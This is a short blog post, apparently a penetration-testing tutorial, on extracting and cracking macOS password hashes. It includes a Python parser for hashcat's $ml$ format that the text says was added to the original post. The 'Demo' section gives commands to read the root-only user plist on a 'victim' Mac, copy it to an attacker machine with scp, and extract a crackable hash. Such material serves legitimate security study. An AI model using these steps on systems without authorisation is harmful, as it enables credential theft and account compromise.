How do we crack OS X password hashes?
I haven’t had tea but I was thinking about the Mac I was remoting into and I suddenly thought.. I wonder how to crack the hashes from a Mac. Surely it’s just cat /etc/passwd and cat /etc/shadow, then unshadow and run hashcat, right?
WRONG!
The hashes for local users are stored under /var/db/dslocal/nodes/Default/users/ (root-only, hence the sudo below).
There is one .plist file per [username], e.g. for the user “user” we would do the following:
sudo cat /var/db/dslocal/nodes/Default/users/user.plist
The file format is XML and is a “Property List” file type:
https://en.wikipedia.org/wiki/Property_list
https://support.apple.com/en-gb/guide/terminal/apda49a1bb2-577e-4721-8f25-ffc0836f6997/mac
We need to extract the hash from that plist; there are two tools for this:
plist2hashcat.py
https://gist.github.com/nueh/8252572
mac2john.py
https://github.com/openwall/john
https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/mac2john.py
Hashcat
https://hashcat.net/wiki/doku.php?id=example_hashes
hashcat mode: 7100
macOS v10.8+ (PBKDF2-SHA512)
Example hash: $ml$35460$93a94bd24b5de64d79a5e49fa372827e739f4d7b6975c752c9a0ff1e5cf72e05$752351df64dd2ce9dc9c64a72ad91de6581a15c19176266b44d98919dfa81f0f96cbcb20a1ffb400718c20382030f637892f776627d34e021bad4f81b7de8222
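To make the $ml$ format concrete, here is a small parser and verifier I added for this post (it is not part of the original post, nor of plist2hashcat.py or mac2john.py). It splits the string into its iteration count, 32-byte salt and the first 64 bytes of the PBKDF2-HMAC-SHA512 output, and checks one known password against it the way a login or an audit of an exported hash would; the sample password and salt used in the comments are constructed.

```python
import hashlib
import hmac
import os
from typing import NamedTuple

# hashcat mode 7100 string, as emitted by plist2hashcat.py / mac2john.py:
#   $ml$<iterations>$<salt hex, 32 bytes>$<entropy hex, 64 bytes>
# The example hash below is the one quoted from the hashcat wiki above.
EXAMPLE_HASH = (
    "$ml$35460$93a94bd24b5de64d79a5e49fa372827e739f4d7b6975c752c9a0ff1e5cf72e05"
    "$752351df64dd2ce9dc9c64a72ad91de6581a15c19176266b44d98919dfa81f0f"
    "96cbcb20a1ffb400718c20382030f637892f776627d34e021bad4f81b7de8222"
)


class MLHash(NamedTuple):
    iterations: int   # PBKDF2 work factor: the main cost of each guess in mode 7100
    salt: bytes       # 32 random bytes, so two users with the same password differ
    entropy: bytes    # first 64 bytes (one SHA-512 block) of the PBKDF2 output


def parse_ml_hash(s: str) -> MLHash:
    """Split a $ml$ string into its fields; raise ValueError if it is malformed."""
    parts = s.split("$")
    if len(parts) != 5 or parts[0] != "" or parts[1] != "ml":
        raise ValueError("not a $ml$ hash string")
    iterations, salt, entropy = int(parts[2]), bytes.fromhex(parts[3]), bytes.fromhex(parts[4])
    if iterations < 1 or len(salt) != 32 or len(entropy) != 64:
        raise ValueError("unexpected field length in $ml$ hash string")
    return MLHash(iterations, salt, entropy)


def derive_entropy(password: str, salt: bytes, iterations: int) -> bytes:
    """PBKDF2-HMAC-SHA512 truncated to 64 bytes, matching the $ml$ entropy field."""
    return hashlib.pbkdf2_hmac("sha512", password.encode("utf-8"), salt, iterations, 64)


def make_ml_hash(password: str, iterations: int, salt: bytes = b"") -> str:
    """Build a $ml$ string (constructed test data, e.g. iterations=1000, salt=bytes(range(32)))."""
    salt = salt or os.urandom(32)
    return f"$ml${iterations}${salt.hex()}${derive_entropy(password, salt, iterations).hex()}"


def verify_password(password: str, ml_hash: str) -> bool:
    """Constant-time check of one candidate password against a $ml$ string."""
    h = parse_ml_hash(ml_hash)
    return hmac.compare_digest(derive_entropy(password, h.salt, h.iterations), h.entropy)
```

The iteration count is what makes each guess expensive, so when auditing an exported hash it is the first field worth reading.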
Demo
If you want to follow along but you don’t have a mac, don’t worry:
#From SSH on the victim (the plist is root-only, so cp and chown need sudo too)
sudo cat /var/db/dslocal/nodes/Default/users/user.plist
sudo cp /var/db/dslocal/nodes/Default/users/user.plist /Users/user/Desktop/user.plist
sudo chown user:staff /Users/user/Desktop/user.plist
#From Attacker KALI/Linux/whatever machine
scp [email protected]:/Users/user/Desktop/user.plist ./
wget https://gist.githubusercontent.com/nueh/8252572/raw/1c5992fccf093dcce13572c6980176864edaf816/plist2hashcat.py
chmod +x plist2hashcat.py
python2 ./plist2hashcat.py user.plist
user:$ml$73529$7331440ead78f9e9567de0f4be67558615e8e1dc3b40d9ac30a0fc26c5dd1d26$2fc1cde58115106f369d44d06ff9f8bd91c4d487bd382d6d110e18a2ab217bd4150ff26d12148ae43fbe04cc7cb67434afad454c4134c7db68e0d0f7c8519bf8